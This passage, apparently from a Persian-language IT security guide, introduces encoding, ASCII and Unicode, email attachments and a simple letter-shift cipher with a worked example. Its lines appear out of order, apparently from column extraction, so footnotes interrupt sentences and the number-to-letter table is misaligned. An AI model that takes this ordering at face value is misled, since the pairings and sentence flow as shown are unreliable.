ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻗﺎﻟﺐ ﻛﺪﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﻌﺪﹰﺍ ﻣﻲﺗﻮﺍﻧـﺪ ﻛﺪﮔـﺸﺎﻳﻲ
ﺷﻮﺩ ﺗﺎ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺗﺒﺪﻳﻞ ﮔﺮﺩﺩ.
ﺑﺠﺎﻱ B
ﻋﺪﺩ ۲۴ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
ﻋﺪﺩ ۲۵ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
ﻋﺪﺩ ۲۶ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
ﻋﺪﺩ ۲۷ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
ﻋﺪﺩ ۲۸ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ.
ﺣﺎﻻ ﻣﻲﺗﻮﺍﻧﻴﻢ ﺭﺷﺘﻪ ﺭﺍ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺭﺳﺎﻝ ﻛﻨﻴﻢ:
ﻛﺪﮔﺬﺍﺭﻱ
ﺑﺠﺎﻱ A
...
ﺑﺠﺎﻱ X
ﺑﺠﺎﻱ Y
ﺑﺠﺎﻱ Z
ﺑﺠﺎﻱ ﻓﺎﺻﻠﻪ
ﺑﺠﺎﻱ ﻧﻘﻄﻪ ﻧﻴﺰ
ﻋﺪﺩ ۰۱ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
ﻋﺪﺩ ۰۲ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
ﻋﺪﺩ ۰۳ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
134 Encoding
135 Encryption
136 Decoding
ﺍﮔﺮ ﻣﻴﺎﻥ ﺍﺭﻗﺎﻡ ﻓﺎﺻﻠﻪ ﻗﺮﺍﺭ ﺩﻫﻴﻢ ﺧﻮﺍﻧﺎﺗﺮ ﻫﻢ ﻣﻲﺷﻮﺩ:
19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20
01 14 20 28.
ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﺷﺪ ،ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﺁﻧﺮﺍ ﺑﻪ ﺣﺎﻟﺖ ﺍﻭﻝ ﺑﺎﺯ
ﻣﻲﮔﺮﺩﺍﻧﺪ:
Sﺟﺎﻳﮕﺰﻳﻦ ۱۹ﻣﻲﺷﻮﺩ؛
Eﺟﺎﻳﮕﺰﻳﻦ ۰۵ﻣﻲﺷﻮﺩ؛
Cﺟﺎﻳﮕﺰﻳﻦ ۰۳ﻣﻲﺷﻮﺩ ،ﻭ ﺍﻳﻨﻜﺎﺭ ﺁﻧﻘﺪﺭ ﺍﺩﺍﻣﻪ ﻣﻲﻳﺎﺑﺪ ﺗﺎ ﺟﻤﻠـﺔ
ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﺁﻳﺪ.
ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ
ﻛﺎﺭﺑﺮﺩ ﺍﺻﻠﻲ ﻛﺪﮔﺬﺍﺭﻱ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺁﻥ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﺩﺭ
ﺍﻧﺘﻘﺎﻝ ﺿﻤﺎﺋﻢ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ .ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﺑﺘﺪﺍ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻣﺘﻮﻥ ﺑﻪ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ ﻃﺮﺍﺣـﻲ ﺷـﺪ ﻭ
ﻣﺒﻨﺎﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﻛﺪ ASCIIﺑﻮﺩ ﻛﻪ ۱۲۸ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ
ﻓﺮﺩ ﺩﺍﺷﺖ .ﺍﻳﻦ ﺗﻌـﺪﺍﺩ ﻛـﺪ ﺑـﺮﺍﻱ ﻧﻤـﺎﻳﺶ ۲۶ﺣـﺮﻑ ﺍﻟﻔﺒـﺎﻱ
ﺍﻧﮕﻠﻴــﺴﻲ ﺑــﻪ ﺷــﻜﻞ ﻛﻮﭼــﻚ ﻭ ﺑــﺰﺭﮒ ۱۰،ﺭﻗــﻢ ،ﺑﺮﺧــﻲ ﺍﺯ
ﻧﺸﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻣﺎﻧﻨﺪ ﻭﻳﺮﮔﻮﻝ ،ﻧﻘﻄﻪ ،ﻛﺮﻭﺷﻪ ﻭ ﻧﻴﺰ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ
ﻛﻠﻴﺪﻫﺎﻱ ﻛﻨﺘﺮﻟﻲ ﻣﺜﻞ Tabﻭ Endﺑﻜﺎﺭ ﻣﻲﺭﻓﺘﻨﺪ.
ﺍﻣﺎ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺯﺑﺎﻧﻬﺎ ﺗﻌﺪﺍﺩ ﺣﺮﻭﻓﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﺑـﺎﻥ ﺍﻧﮕﻠﻴـﺴﻲ
ﺍﺳﺖ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑﺮﻧﺎﻣﻪﻫﺎ ،ﻓﺎﻳﻠﻬﺎﻱ ﭘﺮﺩﺍﺯﺵ ﻛﻠﻤﻪ ،ﻋﻜﺴﻬﺎ
ﻭ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﻓﺎﻳﻠﻬـﺎ ﺍﺯ ﺑﺎﻳﺘﻬـﺎﻱ ۸ﺑﻴﺘـﻲ ﺗـﺸﻜﻴﻞ ﺷـﺪﻩﺍﻧـﺪ ﻭ
ﺑﺨﺶ ﺩﻭﻡ
ﻛﺪﮔﺬﺍﺭﻱ ١٣٤ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ١٣٥ﻓﻨـﻮﻧﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺭﺷـﺘﻪﻫـﺎﻱ
ﺣﺮﻭﻑ ﺭﺍ ﺑﻪ ﻗﺎﻟﺐ ﻭ ﺷﻜﻞ ﺩﻳﮕﺮﻱ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﻨﺪ .ﻛﺪﮔـﺬﺍﺭﻱ
ﺩﺭ ﺩﻧﻴﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻐﻴﻴﺮ ﺷـﻜﻠﻲ ﺍﺳـﺖ ﻛـﻪ ﻇـﺎﻫﺮ ﭘﻴـﺎﻡ ﺭﺍ ﺗﻐﻴﻴـﺮ
ﻣﻲﺩﻫﺪ ،ﺑﻄﻮﺭﻳﻜﻪ ﻧﺘﻴﺠﺔ ﺁﻥ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ؛
ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺰ ﻧﻮﻋﻲ ﺗﻐﻴﻴﺮ ﺷـﻜﻞ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ ﻣﺨﻔـﻲ
ﻛﺮﺩﻥ ﻣﺤﺘﻮﻳﺎﺕ ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ.
ﺑﺠﺎﻱ D
ﻋﺪﺩ ۰۴ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴﻢ؛
١٠٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻣﺠﻤﻮﻋﹰﺎ ۲۵۶ﺣﺮﻑ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺭﺍ ﻣﻲﺳـﺎﺯﻧﺪ ،ﻭ ﻫﻴﭽﻴـﻚ
ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺗﻮﺳﻂ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳﺎﻝ ﮔﺮﺩﻧﺪ.
Unicodeﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﺣﺮﻭﻑ ،ﺷﻤﺎﺭﺓ ﻣﺠﺰﺍﻳﻲ ﺍﺧﺘﺼﺎﺹ
ﻣﻲﺩﻫﺪ .ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ ﻛﻪ ﭼﻪ ﺑـﺴﺘﺮ ،ﺑﺮﻧﺎﻣـﻪ ﻳـﺎ ﺯﺑـﺎﻧﻲ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﺑﺎﺷﺪ .ﺍﺳﺘﺎﻧﺪﺍﺭﺩ Unicodeﺑﺎ ﺭﻫﺒﺮﻱ ﺷﺮﻛﺘﻬﺎﻳﻲ ﭼﻮﻥ
،Microsoft ،JustSystem ،IBM ،HP ،Apple
Unisys ،Sybase ،Sun ،SAP ،Oracleﻭ ...ﻧﻬـــــﺎﻳﻲ
ﺷﺪﻩ ،ﻭ ﺩﺭ ﺗﻤﺎﻡ ﺑﺴﺘﺮﻫﺎ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺛﺎﺑﺖ ﺍﺳﺖ.
ﺑﺮﺍﻱ ﺣﻞ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻔﻬﻮﻡ ﺿﻤﺎﺋﻢ ١٣٧ﺑﻮﺟﻮﺩ ﺁﻣﺪ ،ﻛـﻪ ﺩﺭ ﺁﻥ
ﻓﺎﻳﻠﻲ ﻛـﻪ ﻫﻤـﺮﺍﻩ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺍﺭﺳـﺎﻝ ﻣـﻲ ﺷـﻮﺩ ﺍﺑﺘـﺪﺍ
ﻛﺪﮔﺬﺍﺭﻱ ﻣﻲﮔﺮﺩﺩ ﺗﺎ ﻣﺤﺘﻮﺍﻱ ﺁﻥ ﺑﻪ ﺷﻜﻞ ﺣـﺮﻭﻑ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ
ASCIIﺩﺭ ﺁﻳﺪ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻣﺸﺎﺑﻪ ﻫﻤﺎﻥ ﻓﺮﺁﻳﻨـﺪﻱ ﺍﺳـﺖ ﻛـﻪ
ﻛﻪ ﻃﻲ ﺁﻥ ﺗﻮﺍﻧـﺴﺘﻴﻢ ﺁﻥ ﺟﻤﻠـﻪ ﺭﺍ ﺗﻨﻬـﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻋـﺪﺍﺩ
ﻛﺪﮔ ـﺬﺍﺭﻱ ﻛﻨــﻴﻢ .ﻣــﺸﺎﺑﻪ ﻣﺜــﺎﻝ ﻗﺒﻠــﻲ ،ﺩﺭ ﺍﻳﻨﺠــﺎ ﻧﻴــﺰ ﭘﻴــﺎﻡ
ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﺍﺯ ﺍﺻﻞ ﭘﻴﺎﻡ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ
ﺍﻳﺠﺎﺩ ﺍﺷﻜﺎﻝ ﺧﺎﺻﻲ ﺍﻧﺘﻘـﺎﻝ ﻳﺎﺑـﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺩﺭﻳﺎﻓـﺖ ﺷـﺪ
ﻛﺪﮔﺸﺎﻳﻲ ﮔﺮﺩﺩ ﻭ ﺑﻪ ﺷﻜﻞ ﺍﺻﻠﻲ ﺧﻮﺩ ﺩﺭﺁﻳﺪ.
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻫﻤﺎﻧﻨﺪ ﻛﺪﮔﺬﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻓﺮﺁﻳﻨﺪ ﺁﻥ ،ﻣﺘـﻮﻥ ﻳـﺎ
ﻣﻮﺿﻮﻋﺎﺕ ﺑﻪ ﻗﺎﻟﺐ ﺩﻳﮕﺮﻱ ﺗﺒـﺪﻳﻞ ﻣـﻲﺷـﻮﻧﺪ .ﻫـﺪﻑ ﺍﻳﻨﻜـﺎﺭ
ﻣﺨﻔﻲ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍﻱ ﭘﻴﺎﻡ ﺍﺳﺖ.
Unicode
ﺳﻪ ﺭﻭﺵ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
Unicodeﻧﻮﻋﻲ ﺭﻭﺵ ﻛﺪﮔﺬﺍﺭﻱ ﺑﺮﺍﻱ ﺗﻤﺎﻣﻲ ﺣﺮﻭﻓﻲ ﺍﺳـﺖ
ﻛﻪ ﺩﺭ ﺯﺑﺎﻧﻬﺎﻱ ﺭﺍﻳﺞ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻳﻜﺴﺎﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﻧﺪ .ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﻛـﻪ ﺩﺭ
ﻛﻨـــﺴﺮﺳﻴﻮﻡ (http://www.unicode.org) Unicodeﻣـــﻮﺭﺩ
ﺗﻮﺍﻓﻖ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺑﻪ ﺷﻜﻞ ﺧﻼﺻﻪ ﺫﻛﺮ ﺷﺪﻩ ﺍﺳﺖ:
ﺍﺳﺎﺳﹰﺎ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎ ﺍﻋﺪﺍﺩ ﻭ ﺍﺭﻗﺎﻡ ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ .ﺁﻧﻬﺎ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ
ﻭ ﺩﻳﮕﺮ ﻋﻼﻣﺘﻬﺎ ﺭﺍ ﺑﺎ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻥ ﻳﻚ ﻋـﺪﺩ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ
ﺁﻧﻬﺎ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ .ﭘـﻴﺶ ﺍﺯ ﭘﻴـﺪﺍﻳﺶ Unicodeﺻـﺪﻫﺎ
ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﺍﻳﻦ ﺗﺒﺪﻳﻼﺕ ﻭﺟﻮﺩ ﺩﺍﺷﺖ ،ﺍﻣﺎ
ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﻓﻲ ﺣﺮﻭﻑ ﻭ ﻋﻼﺕ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻼ ﺍﺗﺤﺎﺩﻳﺔ ﺍﺭﻭﭘﺎﻳﻲ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻧﻴﺎﺯ ﺑـﻪ ﭼﻨـﺪﻳﻦ
ﻧﻤﻲﻛﺮﺩﻧﺪ؛ ﻭ ﻣﺜ ﹰ
ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺩﺍﺷﺖ ﺗﺎ ﺗﻤﺎﻣﻲ ﺯﺑﺎﻧﻬﺎﻱ ﺍﺭﻭﭘﺎﻳﻲ ﺭﺍ ﭘﻮﺷـﺶ
ﺩﻫﺪ .ﺣﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺯﺑﺎﻥ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻣﺎﻧﻨـﺪ ﺍﻧﮕﻠﻴـﺴﻲ
ﻧﻴــﺰ ﻳــﻚ ﻛﺪﮔــﺬﺍﺭﻱ ﻭﺍﺣــﺪ ﺑــﺮﺍﻱ ﺗﻤــﺎﻣﻲ ﺣــﺮﻭﻑ ،ﻋﻼﺋــﻢ ﻭ
ﻋﻼﻣﺘﻬﺎﻱ ﺩﺳﺘﻮﺭﻱ ﻭ ﻓﻨﻲ ﻛﺎﻓﻲ ﻧﺒﻮﺩ.
ﻫﻤﭽﻨﻴﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺑﺎ ﻳﻜـﺪﻳﮕﺮ ﻧﺎﺳـﺎﺯﮔﺎﺭ
ﺑﻮﺩﻧﺪ ،ﻳﻌﻨﻲ ﻣﻤﻜﻦ ﺑﻮﺩ ﺩﻭ ﺳﻴﺴﺘﻢ ﻛﺪﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﺍﻋـﺪﺍﺩ
ﻣﺸﺎﺑﻬﻲ ﺑﺮﺍﻱ ﺩﻭ ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩ ﻭ ﻳﺎ ﺑـﺮﺍﻱ ﻳـﻚ
ﺣﺮﻑ ،ﺩﻭ ﻋﺪﺩ ﻣﺨﺘﻠﻒ ﺭﺍ ﺑﻜﺎﺭ ﺑﺮﺩﻩ ﺑﺎﺷـﻨﺪ .ﻫـﺮ ﺭﺍﻳﺎﻧـﻪ )ﺑـﻮﻳﮋﻩ
ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﻩﻫــﺎ( ﺑﺎﻳــﺪ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔــﺬﺍﺭﻱ ﻣﺨﺘﻠﻔــﻲ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﻛﻨﺪ .ﻫﺮ ﺯﻣﺎﻥ ﻛﻪ ﺩﺍﺩﻩ ﻣﻴﺎﻥ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻛﺪﮔـﺬﺍﺭﻱ
ﻣﺨﺘﻠﻒ ﺗﺒﺎﺩﻝ ﻣﻲﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺁﺳـﻴﺐ ﺑﺒﻴﻨـﺪUnicode .
ﺁﻣﺪﻩ ﺑﻮﺩ ﺗﺎ ﺗﻤﺎﻣﻲ ﺍﻳﻦ ﻣﺸﻜﻼﺕ ﺭﺍ ﺣﻞ ﻛﻨﺪ.
137 Attachments
ﺭﻣﺰﮔﺬﺍﺭﻱ
•
•
•
١٣٨
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ
١٤٠
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﻄﺮﻓﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ Hash
١٣٩
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ
ﺑﻪ ﺯﺑﺎﻥ ﺳﺎﺩﻩ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﻣﺸﺎﺑﻪ ﻛﺪﮔـﺬﺍﺭﻱ ﺍﺳـﺖ ﻛـﻪ
ﺣﺮﻭﻑ ﺍﺻﻠﻲ ﻣﺘﻦ ﻫﻤﮕﻲ ﺩﺭ ﺁﻥ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻣﻲﻳﺎﺑﻨﺪ .ﻳﻜـﻲ
ﺍﺯ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫـﺮ ﺣـﺮﻑ
ﺭﺍ ﺑﺎ ﺣﺮﻑ ﺑﻌﺪﻱ ﺁﻥ ﺟﺎﻳﮕﺰﻳﻦ ﻛﻨﻴﻢ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ:
Bﺑﺠﺎﻱ Aﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛
Cﺑﺠﺎﻱ Bﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛
Dﺑﺠﺎﻱ Cﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛
........
Yﺑﺠﺎﻱ Xﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛
Zﺑﺠﺎﻱ Yﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ؛
Aﺑﺠﺎﻱ Zﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ )ﺩﺭ ﭘﺎﻳﺎﻥ ﺣﺮﻭﻑ ﺍﻟﻔﺒﺎ ،ﺩﻭﺑﺎﺭﻩ ﺑﻪ ﺣـﺮﻑ ﺍﻭﻝ
ﺑﺎﺯﮔﺸﺘﻪﺍﻳﻢ(.
ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﻴﻢ ،ﻣﺜـﺎﻝ ﺫﻛـﺮ ﺷـﺪﻩ ﺗﺒـﺪﻳﻞ
ﻣﻲﺷﻮﺩ ﺑﻪ )ﻓﺎﺻﻠﻪ ﻭ ﻧﻘﻄﻪ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﮕﻴﺮﻳﺪ(:
TFDVSJUZ JT JNQPSUBOU.
138 Symmetric Encryption
139 Public Key Encryption
140 One-way Hash Encryption
١٠٧
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺍﻛﻨــﻮﻥ ﺍﻳــﻦ ﭘﻴــﺎﻡ ﺗﻐﻴﻴــﺮ ﻛــﺮﺩﻩ ﺍﺳــﺖ .ﺩﺭﻳﺎﻓــﺖﻛﻨﻨــﺪﻩ ﺁﻧــﺮﺍ
ﺑﺮﻣﻲﮔﺮﺩﺍﻧﺪ ﻭ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﺑﺎ ﺣﺮﻑ ﻗﺒﻠﻲ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﻛﻨﺪ
ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺟﻤﻠﺔ ﺍﺻﻠﻲ ﺑﺪﺳﺖ ﻣﻲﺁﻳﺪ.
ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﻫﺮ ﺣﺮﻑ ﺭﺍ ﻳﻚ ﻭﺍﺣﺪ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻴﻢ ،ﻣﻲﺗﻮﺍﻧﻴﻢ ﺁﻧﻬﺎ
ﺭﺍ ﭼﻨﺪ ﻭﺍﺣﺪ ﻣﻨﺘﻘﻞ ﻛﻨﻴﻢ .ﺗﺎ ﺯﻣﺎﻧﻴﻜﻪ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ ﻣﻘـﺪﺍﺭ ﺍﻳـﻦ
ﺍﻧﺘﻘﺎﻝ ﺭﺍ ﺑﺪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻤﺎﻳﺪ.
ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺳﺎﺩﻩ ﺍﮔﺮ ﭘﻴﺎﻡ ﺷﻤﺎ ﺩﺯﺩﻳـﺪﻩ ﺷـﻮﺩ ﻭ
ﺳﺎﺭﻕ ﻣﺘﻮﺟﻪ ﺭﻭﺡ ﻛﻠﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺸﻮﺩ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺣﺪﺱ
ﺯﺩﻥ ﺑﺘﻮﺍﻧــﺪ ﻣﺤﺘــﻮﺍﻱ ﺁﻧــﺮﺍ ﺑﻔﻬﻤــﺪ .ﺩﺭﺻــﻮﺭﺗﻴﻜﻪ ﺍﻟﮕــﻮﺭﻳﺘﻢ
ﭘﻴﭽﻴﺪﻩﺗﺮ ﺍﺯ ﺁﻥ ﺑﺎﺷﺪ ﻛﻪ ﺑﺎ ﺍﻋﻤﺎﻝ ﭼﻨﺪ ﺟﺎﺑﺠﺎﻳﻲ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﭘﻴﺪﺍ
ﻛﺮﺩ ﺁﻧﮕﺎﻩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﺴﻴﺎﺭ ﻣﺸﻜﻠﺘﺮ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺗﺎ ﻣﺪﺗﻲ ﭘﻴﺶ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻌـﺪﺩﻱ ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺳـﺎﺩﻩ ﺍﻧﺘﻘـﺎﻝ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﺮﺩﻧﺪ.
ﺍﻣﺮﻭﺯﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﺠـﺎﻱ ﺍﻧﺘﻘـﺎﻝ ﺣـﺮﻭﻑ ﺍﺯ ﻓﺮﻣﻮﻟﻬـﺎﻱ
ﺭﻳﺎﺿﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ .ﺍﻟﺒﺘـﻪ ﻫﻨـﻮﺯ ﻫـﻢ ﺍﺯ ﻛﻠﻴـﺪ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣــﻲﻛﻨــﻴﻢ ﻭ ﺍﻳــﻦ ﻛﻠﻴــﺪ ﺑﺨــﺸﻲ ﺍﺯ ﺁﻥ ﻓﺮﻣــﻮﻝ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺖ .ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﭘﻴﺎﻣﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﻴﺪ ﺣﺘﻤـﹰﺎ
ﺑﺎﻳﺪ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﺍﻟﺒﺘﻪ ﺍﮔﺮ ﻛﻠﻴـﺪ ﻣﺨـﺼﻮﺹ ﺭﺍ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻠﻴﺪﻫﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺍﻣﺘﺤﺎﻥ ﻛﻨﻴﺪ ﺗـﺎ ﺑـﻪ
ﺟﻮﺍﺏ ﺑﺮﺳﻴﺪ .ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻛﻠﻴﺪ ﻣﺤﺪﻭﺩ ﺑﻪ ﺷﻤﺎﺭﻩﻫﺎﻱ ۱ﺗﺎ ۱۰
ﻼ
ﺑﺎﺷﺪ ،ﻋﻤﻠﻴﺎﺕ ﺣﺪﺱ ﺯﺩﻥ ﺯﻳﺎﺩ ﻃﻮﻝ ﻧﻤﻲﻛﺸﺪ .ﺍﻣـﺎ ﺍﮔـﺮ ﻣـﺜ ﹰ
